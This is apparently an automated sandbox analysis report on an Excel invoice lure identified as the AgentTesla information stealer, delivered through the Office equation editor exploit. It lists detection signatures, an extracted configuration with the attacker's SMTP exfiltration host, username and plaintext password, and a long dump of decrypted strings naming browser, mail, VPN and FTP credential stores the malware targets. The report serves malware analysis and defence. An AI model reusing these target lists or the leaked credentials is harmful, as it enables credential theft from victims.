Windows Analysis Report
Fatura 002.xlam.xlsx

Overview

General Information

Sample name: Fatura 002.xlam.xlsx
Analysis ID: 1523149
MD5: 404eec23afb533475c11493f7d367ec0
SHA1: 844ba233d3ba4ecc44596bc78f90eecffd0286de
SHA256: eab869eef3b586266919e8d303d196beeb0f22d3f3cbc7b1f521a7e67acd4cf5
Tags: xlam, xlsx, user-abuse_ch

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection

Source: Fatura 002.xlam.xlsx Avira: detected
Source: 6.2.RegSvcs.exe.400000.0.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.solucionesmexico.mx", "Username": "security@solucionesmexico.mx", "Password": " Qdk,[nKrmI0j "}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\coolz.exe ReversingLabs: Detection: 26%
Source: Fatura 002.xlam.xlsx Virustotal: Detection: 50%
Source: Fatura 002.xlam.xlsx ReversingLabs: Detection: 71%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\food[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\coolz.exe Joe Sandbox ML: detected
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: /log.tmp
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>[
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: yyyy-MM-dd HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ]<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Time:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>User Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>Computer Name:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>OSFullName:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>CPU:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>RAM:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: New
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MM/dd/yyyy HH:mm:ss
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IP Address:
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: mail.solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Qdk,[nKrmI0j
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: security@solucionesmexico.mx
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: false
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MBecZ.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: MBecZ
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: true
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Type
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \drivers\etc\hosts
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <b>[
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ]</b> (
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: )<br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {BACK}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {ALT+TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {ALT+F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {TAB}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {ESC}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {Win}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {CAPSLOCK}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {KEYUP}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {KEYDOWN}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {KEYLEFT}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {KEYRIGHT}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {DEL}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {END}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {HOME}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {Insert}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {NumLock}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {PageDown}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {PageUp}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {ENTER}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F1}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F2}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F3}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F4}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F5}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F6}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F7}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F8}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F9}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F10}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F11}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {F12}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: control
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {CTRL}
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: &amp;
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: &lt;
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: &gt;
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: &quot;
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <br><hr>Copied Text: <br>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <hr>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: logins
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Secure Note
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Web Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Credential Picker Protector
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Web Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Credentials
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Domain Certificate Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Domain Password Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Windows Extended Credential
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: 00000000-0000-0000-0000-000000000000
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SchemaId
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pResourceElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pIdentityElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pPackageSid
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pAuthenticatorElement
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IE/Edge
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UC Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UCBrowser\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Login Data
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: journal
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: wow_logins
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Safari for Windows
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <array>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <dict>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <string>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </string>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <data>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </data>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: -convert xml1 -s -o "
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \fixed_keychain.xml"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Microsoft\Credentials\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Microsoft\Protect\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: credential
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: QQ Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Tencent\QQBrowser\User Data
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Default\EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Profile
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \EncryptedStorage
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: entries
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: category
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: str3
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: str2
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: blob0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: password_value
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: IncrediMail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\IncrediMail\Identities\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Accounts_New
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PopPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SmtpPassword
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SmtpServer
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: EmailAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Eudora
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: current
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SavePasswordText
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Settings
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ReturnAddress
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Falkon Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \falkon\profiles\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: profiles.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \browsedata.db
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: autofill
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ClawsMail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Claws-mail
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \clawsrc
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: passkey0
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: master_passphrase_salt=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \accountrc
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: smtp_server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: address
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: account
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \passwordstorerc
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: {(.*),(.*)}(.*)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Flock Browser
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Flock\Browser\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: signons3.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: DynDns
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Dyn\Updater\config.dyndns
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: username=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: password=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: https://account.dyn.com/
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: t6KzXhCh
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ALLUSERSPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Dyn\Updater\daemon.cfg
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: global
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: accounts
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: account.
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: name
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Psi/Psi+
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Psi\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Psi+\profiles
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \accounts.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: OpenVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\OpenVPN-GUI\configs
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Software\OpenVPN-GUI\configs\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: username
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: auth-data
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: entropy
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: USERPROFILE
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \OpenVPN\config\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: remote
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: NordVpn.exe*
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: user.config
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: //setting[@name='Username']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: //setting[@name='Password']/value
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: NordVPN
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: %ProgramW6432%
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ProgramFiles(x86)
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Private Internet Access\data
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \account.json
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: .*"username":"(.*?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: .*"password":"(.*?)"
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Private Internet Access
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: privateinternetaccess.com
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FileZilla
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FileZilla\recentservers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Server>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </Host>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </Port>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <User>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </User>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <Pass encoding="base64">
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: </Pass>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: CoreFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SOFTWARE\FTPWare\COREFTP\Sites
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Host
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Port
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: hdfzpysvpzimorhk
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HostName
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: UserName
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PublicKeyFile
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PortNumber
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: [PRIVATE KEY LOCATION: "{0}"]
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: WinSCP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ABCDEF
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Flash FXP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: port
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: user
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: pass
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: quick.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Sites.dat
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FlashFXP\
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: yA36zA48dEhfrvghGRg57h5UlDv3
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FTP Navigator
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FTP Navigator\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Server
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: No Password
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: User
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SmartFTP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: APPDATA
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SmartFTP\Client 2.0\Favorites\Quick Connect
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: WS_FTP
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: appdata
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: Ipswitch\WS_FTP\Sites\ws_ftp.ini
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: HOST
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: PWD=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FtpCommander
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: SystemDrive
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \cftp\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \VirtualStore\Program Files (x86)\FTP Commander Deluxe\Ftplist.txt
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Server=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Port=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Password=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;User=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: ;Anonymous=
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: FTPGetter
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: \FTPGetter\servers.xml
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server>
Source: 6.2.RegSvcs.exe.400000.0.unpack String decryptor: <server_ip>
